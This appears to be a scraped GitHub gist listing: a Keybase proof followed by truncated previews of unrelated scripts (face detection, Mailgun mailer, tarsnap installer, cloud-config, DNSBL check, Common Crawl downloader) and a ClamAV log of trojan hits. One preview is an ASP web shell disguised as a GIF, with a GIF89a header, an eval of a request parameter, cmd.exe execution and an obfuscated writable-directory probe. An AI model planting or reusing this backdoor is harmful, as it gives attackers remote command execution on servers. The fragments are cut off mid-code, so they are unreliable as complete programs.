I hereby claim:
- I am jonaslejon on github.
- I am jonaslejon (https://keybase.io/jonaslejon) on keybase.
- I have a public key whose fingerprint is 57F6 2694 A9D1 EF48 10AB 396A 27AB BA2E B836 3126
To claim this, I am signing this object:
#!env python | |
import cv,pprint,os | |
from datetime import datetime | |
HAAR_CASCADE_PATH = "/usr/share/opencv/haarcascades/haarcascade_frontalface_default.xml" | |
CAMERA_INDEX = 0 | |
def detect_faces(image, last): | |
faces = [] |
I hereby claim:
To claim this, I am signing this object:
define("DOMAIN", "test.se"); | |
define("MAILGUN_API", "XXX123"); // Mailgun Private API Key | |
function br2nl($string) { | |
return preg_replace('/\<br(\s*)?\/?\>/i', "\n", $string); | |
} | |
function mg_send($to, $subject, $message) { | |
$ch = curl_init(); |
#!/bin/sh | |
# | |
# Author: Jonas Lejon <[email protected]> | |
# 2014-05-30 For Ubuntu | |
# | |
# Usage: | |
# ./tarsnap-install.sh <tarsnap-email> | |
# | |
if [ -z "$1" ] | |
then |
userdata = """ | |
#cloud-config | |
coreos: | |
etcd: | |
# generate a new token for each unique cluster from https://discovery.etcd.io/new | |
discovery: https://discovery.etcd.io/my_unique_token | |
# multi-region and multi-cloud deployments need to use $public_ipv4 | |
addr: $public_ipv4:4001 | |
peer-addr: $public_ipv4:7001 |
#!/usr/bin/env python | |
## | |
## Jonas Lejon 2014 | |
## | |
## sudo pip install apache-libcloud names | |
import os, sys, time | |
import names | |
from libcloud.compute.types import Provider | |
from libcloud.compute.providers import get_driver |
<?php | |
$url = "http://some.url"; | |
$surbl = new Net_DNSBL_SURBL(); | |
$dnsbl->setBlacklists(array('list.dnsbl.org','multihop.dnsbl.org','sbl-xbl.spamhaus.org', 'bl.spamcop.net', 'dnsbl.sorbs.net', 'cbl.abuseat.org','blackholes.five-ten-sg.com','dul.dnsbl.sorbs.net', 'zen.spamhaus.org')); | |
if ($surbl->isListed($url)) | |
return false; | |
reuturn true; |
#!/bin/sh | |
#JAVA_HOME=/ebs/jdk1.7.0_09/ | |
export JAVA_HOME=/ebs/jdk1.7.0_09/ | |
SEGMENT=$1 | |
s3cmd --add-header=x-amz-request-payer:requester ls s3://aws-publicdatasets/common-crawl/parse-output/segment/$SEGMENT/ > $SEGMENT.txt | |
grep metadata $SEGMENT.txt > tmpfile | |
mv tmpfile $SEGMENT.txt | |
mkdir metadata/$SEGMENT/ | |
cd metadata/$SEGMENT | |
for a in `cat ../../$SEGMENT.txt|awk '{print $4}'`; do s3cmd --continue --add-header=x-amz-request-payer:requester get $a; done |
GIF89alovealihack<%eval request("alihack.com")%> | |
<%On Error Resume Next | |
Response.write CreateObject("wscript.shell").exec("cmd.exe /c whoami").StdOut.ReadAll%>| | |
<%Set Fso=server.createobject("scr"&"ipt"&"ing"&"."&"fil"&"esy"&"ste"&"mob"&"jec"&"t") | |
sPath=replace(Server.MapPath("\"),"/", "\") | |
Function CheckDirIsOKWrite(DirStr) | |
On Error Resume Next | |
Fso.CreateTextFile(DirStr&"\temp.tmp") | |
if Err.number<>0 then | |
Err.Clear() |
eljefe-2.1/cuckoo/web/tmp_uploads/tmpHXwzkX/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND | |
eljefe-2.1/cuckoo/web/tmp_uploads/tmpAa9NTe/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND | |
eljefe-2.1/cuckoo/web/tmp_uploads/tmp6c_gCf/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND | |
eljefe-2.1/cuckoo/web/tmp_uploads/tmp18VjC9/384d89e233ce04df0df3f68ab43afcb80a0db375e8c9204f68afb211a35311c3.exe: Win.Trojan.Generickd-217 FOUND | |
Etc. |